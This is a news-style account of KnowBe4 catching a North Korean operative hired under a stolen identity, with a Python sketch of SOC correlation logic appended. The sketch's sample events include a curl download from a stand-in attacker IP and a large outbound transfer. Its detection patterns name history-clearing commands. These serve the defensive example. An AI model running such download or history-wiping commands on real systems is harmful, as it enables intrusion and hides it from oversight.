KnowBe4 recently thwarted a sophisticated attempt by a North Korean national posing as a software engineer to infiltrate their IT systems. Despite undergoing extensive vetting processes, the attacker was detected before any data breach occurred, highlighting the evolving threat landscape faced by organizations.
In an effort to expand its internal IT AI team, KnowBe4 posted a job listing and went through its standard hiring procedures, including multiple video interviews and thorough background checks. The individual, presenting as a legitimate candidate using a stolen US-based identity, successfully passed these checks.
The scam unraveled when the company's Endpoint Detection and Response (EDR) software identified suspicious activities as soon as the new hire's workstation was activated on July 15, 2024. The position in question was for a Principal Software Engineer. The suspicious activities, detected by the SOC at 9:55 PM EST, involved manipulation of session history files, unauthorized file transfers, and malware execution via a Raspberry Pi.
The KnowBe4 Security Operations Center (SOC) immediately contacted the new hire, who claimed to be troubleshooting a router issue. However, when asked for further details, the individual became unresponsive, raising further suspicion. The device was contained by the SOC at 10:20 PM EST. KnowBe4 collaborated with cybersecurity experts Mandiant and the FBI, revealing the hire to be a North Korean operative using an AI-enhanced photo for identification.
The attacker had the workstation shipped to an address that was part of a network of “IT mule laptop farms.” Operating from North Korea or nearby regions in China, the individual worked night shifts to align with US daytime hours, effectively masking their true location.
KnowBe4's response and recommendations
KnowBe4 responded to this incident by enhancing monitoring for anomalies, strengthening background checks and reference verification, and improving access controls and authentication processes. Additionally, security awareness training focusing on social engineering was emphasized.
To prevent similar incidents, it is crucial to scan remote devices to ensure they are not accessed remotely by unauthorized individuals. The vetting processes must be robust, verifying candidates' physical locations and cross-checking career histories for inconsistencies. Video interviews should be conducted with candidates discussing specific job-related tasks, and any discrepancies in shipping addresses and residences should be investigated.
The attacker demonstrated a high level of sophistication by using VOIP numbers and maintaining a minimal digital footprint. There were discrepancies in the address and date of birth provided, conflicting personal information, and suspicious excuses. The attacker also employed sophisticated VPN or VM usage for system access, attempted to execute malware, and engaged in subsequent cover-up efforts.
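As an added illustration (not KnowBe4's detection logic and not code from the original article), the following Python sketches how a SOC might correlate the indicators the EDR raised in this incident: download and execution of unauthorized software, a large outbound transfer, and the subsequent cover-up through session history tampering. The telemetry records, hostnames, addresses and the egress threshold are constructed for the example.

```python
import re
from datetime import datetime, timedelta

# Constructed sample endpoint telemetry (not real KnowBe4 or EDR data).
SAMPLE_EVENTS = [
    {"ts": "2024-07-15T21:52:10", "host": "ws-eng-17", "type": "process",
     "cmdline": "curl -sO http://203.0.113.7/setup.sh"},
    {"ts": "2024-07-15T21:54:30", "host": "ws-eng-17", "type": "netconn",
     "dst": "203.0.113.7", "bytes_out": 48_000_000},
    {"ts": "2024-07-15T21:55:11", "host": "ws-eng-17", "type": "file",
     "path": "/home/newhire/.bash_history", "action": "truncate"},
    {"ts": "2024-07-15T21:55:40", "host": "ws-eng-17", "type": "process",
     "cmdline": "history -c"},
]

HISTORY_FILES = re.compile(r"(\.bash_history|\.zsh_history|ConsoleHost_history\.txt)$")
CLEAR_CMDS = re.compile(r"(history -c|Clear-History|unset HISTFILE|HISTFILE=/dev/null)")
LARGE_EGRESS = 10_000_000  # bytes; constructed threshold for this example

def classify(ev):
    """Map one telemetry event to an indicator label, or None if it looks benign."""
    if ev["type"] == "file":
        if HISTORY_FILES.search(ev["path"]) and ev["action"] in ("truncate", "delete"):
            return "history_tamper"
    elif ev["type"] == "process":
        if CLEAR_CMDS.search(ev["cmdline"]):
            return "history_tamper"
        if re.match(r"(curl|wget)\b.*\bhttps?://", ev["cmdline"]):
            return "remote_download"
    elif ev["type"] == "netconn" and ev.get("bytes_out", 0) >= LARGE_EGRESS:
        return "large_egress"
    return None

def correlate(events, window=timedelta(minutes=15)):
    """Alert per host when history tampering follows other indicators within the window."""
    hits = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        label = classify(ev)
        if label:
            hits.setdefault(ev["host"], []).append((datetime.fromisoformat(ev["ts"]), label))
    alerts = []
    for host, seq in hits.items():
        for i, (t, label) in enumerate(seq):
            prior = {l for pt, l in seq[:i] if l != "history_tamper" and t - pt <= window}
            if label == "history_tamper" and prior:
                alerts.append({"host": host, "ts": t.isoformat(), "preceded_by": sorted(prior)})
                break
    return alerts
```

A single history write in isolation produces no alert; the rule fires only when the cover-up follows other suspicious activity on the same host, which keeps routine shell use out of the SOC queue.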